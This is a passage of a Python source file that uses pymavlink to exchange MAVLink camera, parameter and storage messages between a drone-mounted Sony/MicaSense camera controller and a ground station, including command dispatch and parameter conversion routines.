mavutil.mavlink.MAV_CMD_REQUEST_VIDEO_STREAM_INFORMATION, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to get stream info using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_reset_camera(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_RESET_CAMERA_SETTINGS, # command
0, # Confirmation
1, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to reset camera using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_set_camera_trig_interval(self, the_connection, camTriggerCycle, camShutterIntegration):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_SET_CAM_TRIGG_INTERVAL, # command
0, # Confirmation
camTriggerCycle, # param1
camShutterIntegration, # param2
0, # param3
0, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to set camera trip interval using command long : %s" % (err_msg))
ret = False
return ret
def mavlink_set_camera_to_quaternion(self, the_connection, q1, q2, q3, q4):
#if self.mavlink10():
try:
the_connection.mav.command_long_send(
the_connection.target_system, # target_system
the_connection.target_component, # target_component
mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL_QUAT, # command
0, # Confirmation
q1, # param1
q2, # param2
q3, # param3
q4, # param4
0, # param5
0, # param6
0) # param7
ret = True
except Exception as err_msg:
print("Failed to set camera to quartenion using command long : %s" % (err_msg))
ret = False
return ret
# convert to integer param_value from mavlink
#
def mav_param_type_conv( self, typ, value ):
if ( typ <= mavutil.mavlink.MAV_PARAM_TYPE_INT64 ): # integer types (UINT8..INT64) are byte-wise encoded in the float field
return int(struct.unpack('I', struct.pack('f', value))[0])
else:
return value
# convert an integer param_value to be sent on mavlink
#
def param_to_mav_msg_conv( self, typ, value ):
if ( typ <= mavutil.mavlink.MAV_PARAM_TYPE_INT64 ): # integer types are re-encoded as the raw float bytes before sending
return float(struct.unpack('f', struct.pack('I', value))[0])
else:
return value
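#
# worked example of the byte-wise conversion used above: an integer parameter travels in the
# float param_value field, so its bytes are reinterpreted rather than numerically cast
#
#   as_float = struct.unpack('f', struct.pack('I', 675))[0]              # what goes on the wire
#   back     = int(struct.unpack('I', struct.pack('f', as_float))[0])    # 675 again on receive
#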
def mavlink_send_param_value(self, the_connection):
print("\033[36m sending a parameter")
d = struct.unpack('f', struct.pack('I', 1))[0]
try:
the_connection.mav.param_value_send(
"sonyISO".encode('ascii'),
0,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 1: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 10))[0]
try:
the_connection.mav.param_value_send(
"sonyAperture".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 2: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 30))[0]
try:
the_connection.mav.param_value_send(
"sonyExProMode".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 3: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 5))[0]
try:
the_connection.mav.param_value_send(
"sonyFocusMode".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 4: %s" % (err_msg))
ret = False
p = struct.unpack('f', struct.pack('I', 11))[0]
try:
the_connection.mav.param_value_send(
"sonyFocusArea".encode('ascii'),
p,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 5: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 675))[0]
try:
the_connection.mav.param_value_send(
"sonyShutSpd".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 6: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 76))[0]
try:
the_connection.mav.param_value_send(
"sonyWhiteBalance".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 7: %s" % (err_msg))
ret = False
d = struct.unpack('f', struct.pack('I', 7))[0]
try:
the_connection.mav.param_value_send(
"sonyStillCapMode".encode('ascii'),
d,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
8,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message 8: %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_information(self, the_connection):
#if self.mavlink10():
vendor_name_nd = np.dtype([('ABB',np.uint8)])
model_name_nd = np.dtype([('BAC',np.uint8)])
vendor_name_list = [65,66,66]
model_name_list = [66,65,67]
vendor_name = "ABB"
model_name = "BAC"
#
# convert string to ascii list and make numpy array
#
vn = []
mn = []
j = 0
for j in range(len(model_name)):
mn.append(ord(model_name[j]))
k = 0
for k in range(len(vendor_name)):
vn.append(ord(vendor_name[k]))
u8_model_name = np.array(mn, np.uint8)
u8_vendor_name = np.array(vn, np.uint8)
mn_u8 = u8_model_name.astype(np.uint8)
vn_u8 = u8_vendor_name.astype(np.uint8)
arr_vendor = [0] * 32
arr_vendor[0] = ord("A")
arr_model = [0] * 32
arr_model[0] = ord("C")
# "http://10.0.2.51/cam_defs/alpha_cam_new.xml".encode('ascii'))
print("\033[33m Sending camera information")
try:
the_connection.mav.camera_information_send(
100,
arr_vendor,
arr_model,
0,
0,
0,
0,
0,
0,
0,
391,
1,
"http://10.0.2.51/cam_defs".encode('ascii'))
ret = True
except Exception as err_msg:
print("Failed to send camera information message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_settings(self, the_connection):
#if self.mavlink10():
try:
the_connection.mav.camera_settings_send(
self.time_boot_ms,
self.mode_id, # Camera mode
self.zoomLevel, # Current zoom level (0.0 to 100.0, NaN if not known)
self.focusLevel)
ret = True
except Exception as err_msg:
print("Failed to send camera settings message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_storage_information(self, the_connection):
#if self.mavlink10():
#
# This is a byte array of the string
#
b = bytearray(b'ABB')
#
# forced uint8 with numpy
#
b8_numpy = np.array(b, np.uint8)
#
# ascii string encoded
#
nm = "storenm"
try:
u8_model_name = (nm).encode("ascii")
except Exception as err_msg:
print("\033[32m Failed to SET storage information message : %s " % (err_msg))
print(f" sending storage info {u8_model_name} type {type(u8_model_name)}")
try:
the_connection.mav.storage_information_send(
self.time_boot_ms,
self.storage_id,
self.storage_count,
self.status,
self.total_capacity,
self.used_capacity,
self.available_capacity,
self.read_speed,
self.write_speed,
1,
np.array(u8_model_name,np.uint8),
2)
ret = True
except Exception as err_msg:
print("\033[32m Failed to send storage information message : %s type is %s" % (err_msg,type(u8_model_name)))
ret = False
return ret
def mavlink_send_camera_capture_status(self, the_connection):
try:
the_connection.mav.camera_capture_status_send(
self.time_boot_ms,
self.image_status,
self.video_status,
self.image_interval,
self.recording_time_ms,
self.available_capacity,
self.image_count)
ret = True
except Exception as err_msg:
print("Failed to send camera capture status message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_video_stream_information(self, the_connection):
#if self.mavlink10():
print(" !!! sending the video stream information !!! \n")
try:
the_connection.mav.video_stream_information_send(
self.stream_id,
self.count,
self.stream_type,
self.Vflags,
self.framerate,
self.Vresolution_h,
self.Vresolution_v,
self.bitrate,
self.rotation,
self.hfov,
#self.videoname,
(self.videoname).encode('ascii'),
(self.video_uri).encode('ascii'))
ret = True
except Exception as err_msg:
print("Failed to send video stream information message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_image_captured(self, the_connection):
#if self.mavlink10():
b = bytearray(b'[2,3,4,5]')
print(f"sending cam image cap {self.time_boot_ms}")
try:
the_connection.mav.camera_image_captured_send(
self.time_boot_ms,
self.time_utc,
self.camera_id,
self.lat,
self.lon,
self.alt,
self.relative_alt,
self.q, # quaternion of camera orientation as 4 floats (w, x, y, z)
self.image_index,
self.capture_result,
self.file_url)
ret = True
except Exception as err_msg:
print("Failed to send camera image captured message : %s" % (err_msg))
ret = False
return ret
def mavlink_send_camera_feedback(self, the_connection):
#if self.mavlink10():
print("\033[32m sending camera feedback")
try:
the_connection.mav.camera_feedback_send(
self.time_usec,
the_connection.target_system,
self.cam_idx,
self.img_idx,
self.lat,
self.lng,
self.alt_msl,
self.alt_rel,
self.roll,
self.pitch,
self.yaw,
self.foc_len,
self.CFflags)
ret = True
print("\033[36m success sending camera feedback")
except Exception as err_msg:
print("Failed to send camera feedback message : %s" % (err_msg))
ret = False
return ret
# process the incoming messages received
#
def process_messages_from_connection(self, fra, the_connection, sharedObj, redCam=0):
#"""
#This runs continuously. The mavutil.recv_match() function will call mavutil.post_message()
#any time a new message is received, and will notify all functions in the master.message_hooks list.
#"""
loop = 5
while loop >= 1:
print("im receiving.............")
#self.update_uptime_label( )
#self.update_utc_label( )
#
# wait heartbeat (only the GCS does this )
# m = the_connection.recv_match(type="HEARTBEAT", blocking=True, timeout=5)
#
# you can also use type lists like this
# type=['COMMAND_LONG,RC_CHANNELS']
#
#msg = the_connection.recv_match(blocking=True, timeout=5)
msg = the_connection.recv_match(blocking=True, timeout=1)
if msg is None: # recv_match returns None when the timeout expires
continue
if ( the_connection.target_system == msg.get_srcSystem() ): # check this and eliminate spurious messages if needed
print(f"data read {msg.get_type()}")
print(f"connection {the_connection.target_system} == {msg.get_srcSystem()}")
last_timestamp = msg._timestamp
#
# These are test messages to check the receive end !!!!
#
#self.mavlink_send_camera_feedback( the_connection )
#self.mavlink_send_camera_information(the_connection)
#self.mavlink_send_storage_information(the_connection)
#self.mavlink_send_camera_capture_status(the_connection)
#print(f" video stream returned {self.mavlink_send_video_stream_information(the_connection)}")
#self.mavlink_send_camera_image_captured(the_connection)
#the_connection.mav.camera_feedback_send( 1000, 1, 1, 22, 21, 10, 30, 21, 2, 3, 5, 2, 3)
#the_connection.mav.gps_raw_int_send( 1000, self.g_count, 77, 66, 76, 3, 1, 2, 3, 5)
#the_connection.mav.vibration_send( 1000, 1, 1, 22, 21, 10, 30 )
self.mavlink_send_param_value(the_connection)
#print("FTP request for XML file .... I'm sending it as my payload")
#try:
# f = open(self.CAM_XML_FILE,'r')
# #payload = f.read() not raw read but as bytes below
# lab = np.fromfile(f, dtype=np.uint8)
# f.close()
#except Exception as e:
# print(f" XML file read exception {e}")
#self.mavlink_do_ftp_send( the_connection, self.NETWORK_ID, lab)
self.g_count = self.g_count + 1
if not msg:
return
if msg.get_type() == "BAD_DATA":
self.ACK_ERROR = self.GOT_BAD
self.errRCV_COMMAND = 0
self.errRPM2 = 0
if mavutil.all_printable(msg.data):
sys.stdout.write(msg.data)
sys.stdout.flush()
elif msg.get_type() == 'PARAM_REQUEST_LIST':
# this i will now try from the class objects
#
self.mavlink_send_param_value(the_connection)
#
sharedObj.mav_req_all_param = sharedObj.MAV_REQ_ALL_PARAM
print("\033[35m PARAM_REQUEST_LIST was sent - shared object set to %d" % (sharedObj.mav_req_all_param))
# trap was found taken it out..... exit(97)
#exit(99)
elif msg.get_type() == 'PARAM_SET':
# this i will now try from the class objects
#
self.mavlink_send_param_value(the_connection)
#
# sharedObj.mav_req_all_param = sharedObj.MAV_REQ_ALL_PARAM
#
# value is sent as a float but its an integer, so unpack the float read as an integer
#
# ref:- https://gist.github.com/AlexEshoo/d3edc53129ed010b0a5b693b88c7e0b5
#
m = struct.unpack('I', struct.pack('f', msg.param_value))[0]
x = self.mav_param_type_conv( msg.param_type, msg.param_value )
if ( self.writeParamSetFromMavLink( msg.param_id, sharedObj, m ) == True ):
#print("\033[33m PARAM_SET was sent for %s :: %d type %d"%( msg.param_id, msg.param_value, msg.param_type ))
print(f"\033[33m PARAM_SET was sent for {msg.param_id} val {msg.param_value} type {msg.param_type} really sent {m}" )
else:
print("\033[31m PARAM_SET write fail for %s :: %d type %d"%( msg.param_id, msg.param_value, msg.param_type ))
# ===== TRAP =====
#exit(97)
elif msg.get_type() == 'PARAM_EXT_VALUE':
# this i will now try from the class objects
#
# self.mavlink_send_param_value(the_connection)
#
sharedObj.mav_req_all_param = sharedObj.MAV_REQ_ALL_PARAM
print("\033[35m PARAM_EXT_VALUE was sent for %s %d"%( msg.param_id, int(msg.param_value)))
# ===== TRAP =====
#exit(96)
elif msg.get_type() == 'PARAM_EXT_SET':
# this i will now try from the class objects
#
# self.mavlink_send_param_value(the_connection)
#
if ( self.writeParamSetFromMavLink( msg.param_id, sharedObj, self.mav_param_type_conv( msg.param_type, msg.param_value ) ) == True ):
print("\033[35m PARAM_SET was sent for %s :: %d"%( msg.param_id, self.mav_param_type_conv(msg.param_type, msg.param_value) ))
else:
print("\033[31m PARAM_SET write fail for %s :: %s"%( msg.param_id, msg.param_value))
# ===== TRAP =====
#exit(95)
elif msg.get_type() == 'RC_CHANNELS':
print("RC Channel message (system %u component %u)\n" % (the_connection.target_system, the_connection.target_component))
elif msg.get_type() == 'COMMAND_LONG':
print("!!!!!! Long message received (system %u component %u)\n" % (the_connection.target_system, the_connection.target_component))
print("in cmd long ... ACK RES %s %u \n" % (self.ACK_RESULT,mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_INFORMATION))
print("Command %u p1 %u p2 %u p3 %u p4 %u \n" % (msg.command, msg.param1, msg.param2, msg.param3, msg.param4))
print("p5 %u p6 %u p7 %u \n" % (msg.param5, msg.param6, msg.param7))
# print(msg.get_payload())
# print(msg.get_msgbuf())
# print(msg.get_fieldnames())
# print(msg.get_type())
#
# print the message recieved in json
#
print(msg.to_dict())
if not (self.ACK_RESULT == mavutil.mavlink.MAV_RESULT_ACCEPTED):
self.RCV_COMMAND = int(msg.command)
print(f"\033[35m IN LOOP :: self ACK RES {self.ACK_RESULT} RCV {self.RCV_COMMAND} == {mavutil.mavlink.MAV_CMD_REQUEST_MESSAGE}")
if (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_REQUEST_MESSAGE):
self.RPM2 = int(msg.param1)
print(f"Is it here {self.RPM2} == {self.CAMERA_INFORMATION}")
if (self.RPM2 == self.CAMERA_INFORMATION): #camera_information
self.type_of_msg = 6500
print("\033[34m >>>>>> camera information \033[36m >>>>>>>>>>>>>>>>>>>>>>")
self.mavlink_send_camera_information(the_connection)
elif (self.RPM2 == self.CAMERA_SETTINGS): #camera_settings
self.type_of_msg = 6501
elif (self.RPM2 == self.STORAGE_INFORMATION): #storage information
self.type_of_msg = 6502
elif (self.RPM2 == self.CAMERA_CAPTURE_STATUS): #camera capture status
self.type_of_msg = 6503
elif (self.RPM2 == mavutil.mavlink.MAVLINK_MSG_ID_CAMERA_IMAGE_CAPTURED): #retrieve lost images
self.type_of_msg = 6504
self.Got_Param1 = int(msg.param2)
elif (self.RPM2 == 269): #video stream
self.type_of_msg = 6505
else:
self.type_of_msg = 0
print(f"camera info received {self.RPM2}")
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_INFORMATION):
print("request camera Info OLD MESSAGE.....")
#
# Send camera information
#
self.mavlink_send_camera_information(the_connection)
if (msg.param1 == 1):
self.type_of_msg = mavutil.mavlink.MAV_CMD_REQUEST_CAMERA_INFORMATION
print("=========== !! send to QGround Camera Information !! ==========")
self.mavlink_send_camera_information(the_connection)
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_REQUEST_VIDEO_STREAM_INFORMATION):
print("request video stream Info OLD MESSAGE.....")
self.type_of_msg = mavutil.mavlink.MAV_CMD_REQUEST_VIDEO_STREAM_INFORMATION
print("=========== !! send to QGround VideoStream !! ==========")
self.mavlink_send_video_stream_information(the_connection)
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_SET_RELAY):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_SET_RELAY
print(f"\033 [31m >>>>> Got a message to set the RelayNo {msg.param1} to state {msg.param2}")
self.raspberry_pi3_set_relay(self, msg.param1, msg.param2)
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_START_CAPTURE
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_STOP_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_STOP_CAPTURE
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_IMAGE_START_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_IMAGE_START_CAPTURE
self.Got_Param1 = msg.param2
self.Got_Param2 = msg.param3
self.Got_Param3 = msg.param4
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_IMAGE_STOP_CAPTURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_IMAGE_STOP_CAPTURE
self.Got_Param1 = msg.param3
self.Got_Param2 = msg.param4
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_START_STREAMING):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_START_STREAMING
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_VIDEO_STOP_STREAMING):
self.type_of_msg = mavutil.mavlink.MAV_CMD_VIDEO_STOP_STREAMING
self.Got_Param1 = msg.param1
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_SET_CAMERA_MODE
self.Got_Param1 = msg.param2
elif (self.RCV_COMMAND == mavdefs.MAV_CMD_SET_CAMERA_ZOOM):
self.type_of_msg = mavdefs.MAV_CMD_SET_CAMERA_ZOOM
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == mavdefs.MAV_CMD_SET_CAMERA_FOCUS):
self.type_of_msg = mavdefs.MAV_CMD_SET_CAMERA_FOCUS
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONFIGURE):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONFIGURE
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
self.Got_Param5 = msg.param5
self.Got_Param6 = msg.param6
self.Got_Param7 = msg.param7
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONTROL):
#
# Taking a picture is hard coded to here as it needs no delay
#
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_DIGICAM_CONTROL
print(f"\033[33m DO DIGICAM CONTROL {msg.param1} {msg.param1}")
if ((int(msg.param5) == 1) and (int(msg.param7) == 1)):
try:
if (redCam.redEdgeCaptureFivePicturesNoUpload() == 1):
print("Took the micasense pictures on SD Card")
else:
print("Error taking pictures with the micasense camera")
except Exception as e:
print(f" Tried to take picture ERROR:: {e}")
elif ((int(msg.param5) == 1) and (int(msg.param7) == 0)):
try:
if (redCam.redEdgeCaptureFivePictures() == 1):
print("saved the pictures to the raspberry Pi")
else:
print("error saving the pictures to the raspberry Pi")
except Exception as e:
print(f" Tried to take picture ERROR:: {e}")
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
self.Got_Param5 = msg.param5
self.Got_Param6 = msg.param6
self.Got_Param7 = msg.param7
print("\033[36m DO DIGICAM CONTROL COMPLETED")
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_CONTROL_VIDEO):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_CONTROL_VIDEO
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_SET_CAM_TRIGG_INTERVAL):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_SET_CAM_TRIGG_INTERVAL
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_RESET_CAMERA_SETTINGS):
self.type_of_msg = mavutil.mavlink.MAV_CMD_RESET_CAMERA_SETTINGS
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL_QUAT):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_MOUNT_CONTROL_QUAT
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
self.Got_Param4 = msg.param4
#elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_GIMBAL_MANAGER_PITCHYAW):
# self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_GIMBAL_MANAGER_PITCHYAW
# self.Got_Param1 = msg.param1
# self.Got_Param2 = msg.param2
# self.Got_Param3 = msg.param3
# self.Got_Param4 = msg.param4
# self.Got_Param5 = msg.param5
# self.Got_Param6 = msg.param6
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_TRIGGER_CONTROL):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_TRIGGER_CONTROL
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == 2004): # MAV_CMD_CAMERA_TRACK_POINT=2004
self.type_of_msg = 2004
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == 2005): # MAV_CMD_CAMERA_TRACK_RECTANGLE=2005
self.type_of_msg = 2005
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
self.Got_Param3 = msg.param3
elif (self.RCV_COMMAND == 2010): # MAV_CMD_CAMERA_STOP_TRACKING=2010
self.type_of_msg = 2010
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_STORAGE_FORMAT):
self.type_of_msg = mavutil.mavlink.MAV_CMD_STORAGE_FORMAT
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
elif (self.RCV_COMMAND == mavutil.mavlink.MAV_CMD_DO_SET_SERVO):
self.type_of_msg = mavutil.mavlink.MAV_CMD_DO_SET_SERVO
self.Got_Param1 = msg.param1
self.Got_Param2 = msg.param2
print("\033[32m saw the relay command come in")
else:
print(f"got this id {self.RCV_COMMAND} {msg.command}")
self.RPM2 = 0
self.type_of_msg = self.RCV_COMMAND
self.ACK_RESULT = mavutil.mavlink.MAV_RESULT_ACCEPTED
print("\033[36m >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ACK RES %d %d"%(self.ACK_RESULT,mavutil.mavlink.MAV_RESULT_ACCEPTED))
print("\033[31m")
else:
self.ACK_ERROR = self.GOT_ERROR
self.errRCV_COMMAND = msg.command
self.errRPM2 = msg.param1
print(f"Error ACK message send for multiple request @ cmd :: {self.errRCV_COMMAND} rpm :: {self.errRPM2}")
elif msg.get_type() == 'CAMERA_IMAGE_CAPTURED':
print("Cam Cap message received (system %u component %u)\n" % (the_connection.target_system, the_connection.target_component))
print("lat %u lon %u alt %u\n" % (msg.lat, msg.lon, msg.alt))
print("URL %u)\n" % (msg.file_url))
elif msg.get_type() == 'GPS_RAW_INT':
the_connection.mav.gps_raw_int_send( 1000, 1, 22, 21, 1, 3, 1, 2, 3, 5)
elif msg.get_type() == 'CAMERA_FEEDBACK':
print("Camera Feedback request was made")
#the_connection.mav.camera_feedback_send( 1000, 1, 1, 22, 21, 10, 30, 21, 2, 3, 5, 2, 3)
elif msg.get_type() == 'FILE_TRANSFER_PROTOCOL':
print("FTP request for XML file .... I'm sending it as my payloads in chunks of 251 bytes")
lab = []
try:
f = open(self.CAM_XML_FILE,'r')
#payload = f.read() not raw read but as bytes below
lab = np.fromfile(f, dtype=np.uint8)
f.close()
except Exception as e:
print(f" XML file read exception {e}")
self.mavlink_do_ftp_send( the_connection, self.NETWORK_ID, lab)
elif msg.get_type() == 'REQUEST_DATA_STREAM':
print("REQUEST DATA STREAM :: start %u id %u req_rte %u\n" % (msg.start_stop, msg.req_stream_id, msg.req_message_rate))
elif msg.get_type() == 'STATUSTEXT':
print("STATUSTEXT :: text %s " % (msg.text))
elif msg.get_type() == 'HEARTBEAT':
print("HEARTBEAT :: src %s type %s auto %s sys %s" % (msg.get_srcSystem(), msg.type,msg.autopilot,msg.system_status))
else:
print(f"unsupported command :: {msg.get_type()}")
#time.sleep(0.05)
loop = loop - 1
def mavlink_send_ack_command(self, the_connection, cmd, rpm2, pro, res):
if (self.mavlink20(the_connection) == True):
print(f"\033[31m sending an ACK {pro}")
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res), # result
int(pro), # progress
int(rpm2), # result_param2
the_connection.target_system, # target_system
the_connection.target_component) # target_component
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 1st ACK message : %s" % (err_msg))
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res)) # result
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 2nd ACK message : %s" % (err_msg))
ret = False
return ret
elif (self.mavlink10(the_connection) == True):
print(f"\033[31m sending an ACK {pro}")
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res)) # result
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 1st ACK message : %s" % (err_msg))
try:
the_connection.mav.command_ack_send(
int(cmd), # command
int(res), # result
int(pro), # progress
int(rpm2), # result_param2
the_connection.target_system, # target_system
the_connection.target_component) # target_component
print(f"ACK sent {rpm2} {res}")
ret = True
except Exception as err_msg:
print("Failed 2nd ACK message : %s" % (err_msg))
ret = False
return ret
def writeParamSetFromMavLink( self, msgString, mavObj, dataRcv ):
# must be EXACT tag match
patternISO = re.compile(r"\bsonyISO\b")
patternAper = re.compile(r"\bsonyAperture\b")
patternExPro = re.compile(r"\bsonyExProMode\b")
patternFocus = re.compile(r"\bsonyFocusMode\b")
patternFocA = re.compile(r"\bsonyFocusArea\b")
patternShSp = re.compile(r"\bsonyShutSpd\b")
patternWhiBal = re.compile(r"sonyWhiteBalance")
patternStCa = re.compile(r"\bsonyStillCapMode\b")
if not (msgString.find("sonyISO") == -1):
#if (re.search(patternISO, msgString.lower())==True):
return (mavObj.setMavIsoModeData( dataRcv ))
elif not (msgString.find("sonyAperture") == -1):
#elif (re.search(patternAper, msgString.lower())==True):
return (mavObj.setMavApertureData( dataRcv ))
elif not (msgString.find("sonyExProMode") == -1):
#elif (re.search(patternExPro, msgString.lower())==True):
return (mavObj.setMavExProData( dataRcv ))
elif not (msgString.find("sonyFocusArea") == -1):
#elif (re.search(patternFocA, msgString.lower())==True):
return (mavObj.setMavFocusAreaData( dataRcv ))
elif not (msgString.find("sonyFocusMode") == -1):
#elif (re.search(patternFocus, msgString.lower())==True):
return (mavObj.setMavFocusData( dataRcv ))
elif not (msgString.find("sonyShutSpd") == -1):
#elif (re.search(patternShSp, msgString.lower())==True):
return (mavObj.setMavShutterData( dataRcv ))
elif not (msgString.find("sonyWhiteBalance") == -1):
#elif (re.search(patternWhiBal, msgString.lower())==True):
return (mavObj.setMavWhiteBalData( dataRcv ))
elif not (msgString.find("sonyStillCapMode") == -1):
#elif (re.search(patternStCa, msgString.lower())==True):
return (mavObj.setMavStillCapModeData( dataRcv ))
else:
print("unsupported variable name %s to val=%d :: NOT SET "%(msgString,dataRcv))
return False
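#
# Equivalent table-driven sketch (assumption: the setter methods keep the signatures
# used above); kept as a comment so the behaviour of writeParamSetFromMavLink is unchanged.
#
# PARAM_SETTERS = {
#     "sonyISO": "setMavIsoModeData",
#     "sonyAperture": "setMavApertureData",
#     "sonyExProMode": "setMavExProData",
#     "sonyFocusArea": "setMavFocusAreaData",
#     "sonyFocusMode": "setMavFocusData",
#     "sonyShutSpd": "setMavShutterData",
#     "sonyWhiteBalance": "setMavWhiteBalData",
#     "sonyStillCapMode": "setMavStillCapModeData",
# }
# for tag, setter in PARAM_SETTERS.items():
#     if tag in msgString:
#         return getattr(mavObj, setter)(dataRcv)
# return False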
#
# ============================================================= multi-process threads =====================================================================
#
def manageAlphaCameraExpro( mySonyCam, mav2SonyVals, expro, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamExProData( expro, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - expro.timestamp) > time_delta):
if (mySonyCam.getSonyCamExProData( expro )==True):
expro.timestamp = timenow
#print(f"\033[36m Time Delta occurred {timenow} {expro.timestamp}")
#else:
#print(f"\033[34m No time diff {timenow} {expro.timestamp}")
print ('Exiting :', multiprocessing.current_process().name)
def sendMavExpro( mySonyCam, expro, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
